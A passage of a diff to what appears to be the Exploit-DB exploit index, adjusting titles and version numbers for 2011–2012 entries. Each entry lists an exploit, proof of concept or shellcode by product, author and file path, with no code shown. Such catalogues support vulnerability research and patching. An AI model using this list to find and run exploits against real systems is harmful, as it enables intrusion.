Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0 +17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 & 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0 17291,platforms/windows/dos/17291.py,"Steam Software Denial of Service Vulnerability",2011-05-16,david.r.klein,windows,dos,0 -17292,platforms/php/webapps/17292.txt,"Media In Spot CMS Local File Inclusion Vulnerability",2011-05-16,"wlhaan haker",php,webapps,0 -17293,platforms/php/webapps/17293.txt,"Media In Spot CMS SQL Injection Vulnerability",2011-05-16,"Iolo Morganwg",php,webapps,0 +17292,platforms/php/webapps/17292.txt,"Media In Spot CMS - Local File Inclusion Vulnerability",2011-05-16,"wlhaan haker",php,webapps,0 +17293,platforms/php/webapps/17293.txt,"Media In Spot CMS - SQL Injection Vulnerability",2011-05-16,"Iolo Morganwg",php,webapps,0 17294,platforms/windows/local/17294.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow",2011-05-16,sinfulsecurity,windows,local,0 17295,platforms/php/webapps/17295.txt,"Vanilla Forum 2.0.17.9 LFI Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 @@ -15075,7 +15075,7 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface Local File Include",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/linux/shellcode/17371.txt,"Linux/x86-32 - ConnectBack with SSL connection - 422 bytes",2011-06-08,"Jonathan Salwan",linux,shellcode,0 -17372,platforms/windows/dos/17372.txt,"VLC Media Player XSPF Local File Integer overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 +17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP Remote BOF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",2011-06-09,metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS SQL Injection vulnerability exploit",2011-06-09,Sideswipe,asp,webapps,0 @@ -15126,7 +15126,7 @@ id,file,description,date,author,platform,type,port 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe Opcode 9 Buffer Overflow",2011-06-21,metasploit,windows,remote,0 17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog Buffer Overflow",2011-06-21,metasploit,windows,remote,0 -17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager SQL Injection exploit",2011-06-22,"Number 7",php,webapps,0 +17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(""/etc/shadow"", 0666) - exit(0) - 43 bytes",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 @@ -15192,8 +15192,8 @@ id,file,description,date,author,platform,type,port 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U Dos/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 -17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 -17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 +17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 +17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - .ZIP File Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 @@ -15215,14 +15215,14 @@ id,file,description,date,author,platform,type,port 17530,platforms/php/webapps/17530.txt,"SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections",2011-07-14,jdc,php,webapps,0 17531,platforms/php/webapps/17531.txt,"PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17532,platforms/php/webapps/17532.txt,"PG eLMS Pro vDEC_2007_01 Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 -17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia SQL Injection Vulnerability",2011-07-14,Netrondoank,php,webapps,0 +17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection Vulnerability",2011-07-14,Netrondoank,php,webapps,0 17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,metasploit,multiple,remote,0 17536,platforms/windows/remote/17536.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",2011-07-16,metasploit,windows,remote,0 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (MSF)",2011-07-18,"James Fitts",windows,remote,0 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer overflow",2011-07-17,metasploit,windows,remote,0 -17544,platforms/windows/dos/17544.txt,"GDI+ CreateDashedPath Integer overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 +17544,platforms/windows/dos/17544.txt,"GDI+ CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win32/shellcode/17545.txt,"win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes",2011-07-18,KaHPeSeSe,win32,shellcode,0 17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server 1.0 - REST, PASV Buffer Overflow Exploit",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 17548,platforms/windows/remote/17548.rb,"FreeFloat FTP Server REST Buffer Overflow (MSF)",2011-07-19,KaHPeSeSe,windows,remote,0 @@ -15275,7 +15275,7 @@ id,file,description,date,author,platform,type,port 17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal Multiple SQL Injection Vulnerabilities",2011-08-04,Netrondoank,multiple,webapps,0 17607,platforms/windows/local/17607.rb,"FreeAmp 2.0.7 .fat Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 -17610,platforms/multiple/dos/17610.py,"OpenSLP - Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 +17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow Exploit",2011-08-05,ZadYree,linux,local,0 17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)",2011-08-05,Rh0,windows,remote,0 17613,platforms/php/webapps/17613.php,"Wordpress Plugin E-commerce <= 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 @@ -15327,7 +15327,7 @@ id,file,description,date,author,platform,type,port 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)",2011-08-16,mr_me,windows,remote,0 17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion Vulnerability",2011-08-17,NoGe,php,webapps,0 -17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script SQL Injection Vulnerability",2011-08-17,v3n0m,php,webapps,0 +17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection Vulnerability",2011-08-17,v3n0m,php,webapps,0 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin LIST command Remote Heap Overflow PoC",2011-08-17,0in,windows,dos,0 17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin <= 1.1.2 - SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin <= 1.3 - SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 @@ -15340,7 +15340,7 @@ id,file,description,date,author,platform,type,port 17685,platforms/php/webapps/17685.txt,"Elgg <= 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin <= 3.0 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin <= 1.2 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 -17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 +17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin <= 1.1.7 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow Exploit (MSF)",2011-08-19,Qnix,windows,remote,0 @@ -15445,7 +15445,7 @@ id,file,description,date,author,platform,type,port 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Vulnerability",2011-09-08,"RiRes Walid",php,webapps,0 17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin <= 0.2.9 - SQL Injection Vulnerability",2011-09-09,"Miroslav Stampar",php,webapps,0 17809,platforms/php/webapps/17809.txt,"WordPress A to Z Category Listing plugin <= 1.3 - SQL Injection Vulnerability",2011-09-09,"Miroslav Stampar",php,webapps,0 -17810,platforms/windows/remote/17810.rb,"BisonFTP Server Remote Buffer Overflow Exploit (MSF)",2011-09-09,"SecPod Research",windows,remote,0 +17810,platforms/windows/remote/17810.rb,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit (MSF)",2011-09-09,"SecPod Research",windows,remote,0 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17814,platforms/php/webapps/17814.txt,"Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability",2011-09-09,serk,php,webapps,0 @@ -15509,7 +15509,7 @@ id,file,description,date,author,platform,type,port 17877,platforms/windows/local/17877.py,"AVCon DEP Bypass",2011-09-20,blake,windows,local,0 17878,platforms/windows/dos/17878.txt,"EViews <= 7.0.0.1 (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT <= 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 -17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 File Parsing Buffer Overflow in QUO",2011-09-20,metasploit,windows,local,0 +17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,metasploit,windows,local,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO <= 2.2.5 - Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub <= 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 @@ -15561,7 +15561,7 @@ id,file,description,date,author,platform,type,port 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 Arbitrary Command Execution",2011-10-07,metasploit,linux,webapps,0 17942,platforms/linux/local/17942.c,"pkexec Race Condition Privilege Escalation Exploit",2011-10-08,xi4oyu,linux,local,0 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 -17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 +17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,metasploit,php,webapps,0 17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST)",2011-10-09,metasploit,windows,remote,0 @@ -15607,7 +15607,7 @@ id,file,description,date,author,platform,type,port 17996,platforms/linux_mips/shellcode/17996.c,"MIPS Linux XOR Shellcode Encoder (60 Bytes)",2011-10-18,entropy,linux_mips,shellcode,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection & XSS vulnerabilities",2011-10-19,"Stefan Schurtz",php,webapps,0 17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection Vulnerability",2011-10-19,"I2sec-dae jin Oh",php,webapps,0 -17999,platforms/php/webapps/17999.txt,"WHMCompleteSolution (cart.php) Local File Disclosure",2011-10-19,"Lagripe-Dz and Mca-Crb",php,webapps,0 +17999,platforms/php/webapps/17999.txt,"WHMCompleteSolution (cart.php) 3.x.x - 4.0.x Local File Disclosure",2011-10-19,"Lagripe-Dz and Mca-Crb",php,webapps,0 18000,platforms/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta force_download.php Local File Inclusion",2011-10-19,"Sangyun YOO",php,webapps,0 18001,platforms/php/webapps/18001.txt,"CMSmini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps,0 18002,platforms/php/webapps/18002.txt,"Uiga Personal Portal Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps,0 @@ -15660,7 +15660,7 @@ id,file,description,date,author,platform,type,port 18055,platforms/php/webapps/18055.txt,"Wordpress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit",2011-10-31,"Dillon Beresford",windows,remote,0 -18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 +18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 @@ -15717,13 +15717,13 @@ id,file,description,date,author,platform,type,port 18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection Vulnerability",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",2011-11-17,metasploit,windows,remote,0 -18124,platforms/windows/dos/18124.py,"Thunder kankan player - Stack overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 +18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading vulnerability",2011-11-19,metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection Vulnerability",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer calendar <= 1.01 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp <= 1.6 - SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 -18131,platforms/php/webapps/18131.txt,"ARASTAR SQL Injection Vulnerability",2011-11-19,TH3_N3RD,php,webapps,0 +18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection Vulnerability",2011-11-19,TH3_N3RD,php,webapps,0 18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0 18137,platforms/win32/local/18137.rb,"QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0 @@ -15762,10 +15762,10 @@ id,file,description,date,author,platform,type,port 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 Stack Buffer Overflow",2011-12-01,"Nick Freeman",windows,local,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 -18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server Denial of Service Vulnerability",2011-12-02,"SecPod Research",windows,dos,0 -18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server Directory Traversal Vulnerability",2011-12-02,"SecPod Research",windows,remote,0 +18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service Vulnerability",2011-12-02,"SecPod Research",windows,dos,0 +18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal Vulnerability",2011-12-02,"SecPod Research",windows,remote,0 18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,metasploit,windows,remote,0 -18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 +18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 and 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)",2011-12-03,metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 @@ -15782,7 +15782,7 @@ id,file,description,date,author,platform,type,port 18213,platforms/php/webapps/18213.php,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection, Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans <= 1.4.8 SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 -18217,platforms/php/webapps/18217.txt,"SantriaCMS SQL Injection Vulnerability",2011-12-08,Troy,php,webapps,0 +18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection Vulnerability",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 @@ -15930,7 +15930,7 @@ id,file,description,date,author,platform,type,port 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"MS12-004 midiOutPlayNextPolyEvent Heap Overflow",2012-01-28,metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 -18428,platforms/php/webapps/18428.txt,"HostBill App Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0 +18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0 18429,platforms/php/webapps/18429.pl,"4images 1.7.6 - 9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 SQLi Vulnerability",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 @@ -15978,7 +15978,7 @@ id,file,description,date,author,platform,type,port 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Multiple Vulnerabilities (LFI - XSS)",2012-02-12,"Avram Marius",php,webapps,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling Vulnerability",2012-02-16,metasploit,windows,remote,0 -18487,platforms/php/webapps/18487.html,"SocialCMS CSRF Vulnerability",2012-02-16,"Ivano Binetti",php,webapps,0 +18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF Vulnerability",2012-02-16,"Ivano Binetti",php,webapps,0 18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger <= 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 @@ -16006,7 +16006,7 @@ id,file,description,date,author,platform,type,port 18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 - Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 -18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone Privilege Escalation - Security Advisory - SOS-12-001",2012-02-23,"Sense of Security",hardware,webapps,0 +18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,metasploit,windows,remote,0 @@ -16041,12 +16041,12 @@ id,file,description,date,author,platform,type,port 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (msf)",2012-03-04,metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0 18559,platforms/php/webapps/18559.txt,"AneCMS v.2e2c583 LFI exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 -18560,platforms/php/webapps/18560.txt,"Symfony2 Local File Disclosure - Security Advisory - SOS-12-002",2012-03-05,"Sense of Security",php,webapps,0 +18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"forkcms 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,metasploit,php,remote,0 -18566,platforms/asp/webapps/18566.txt,"Iciniti Store SQL Injection - Security Advisory - SOS-12-003",2012-03-07,"Sense of Security",asp,webapps,0 +18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 'cprt' Overflow""",2012-03-08,metasploit,windows,remote,0 @@ -16255,7 +16255,7 @@ id,file,description,date,author,platform,type,port 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0 18819,platforms/windows/dos/18819.cpp,"Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0 18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 -18822,platforms/php/webapps/18822.txt,"php-decoda Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 +18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton Multiple 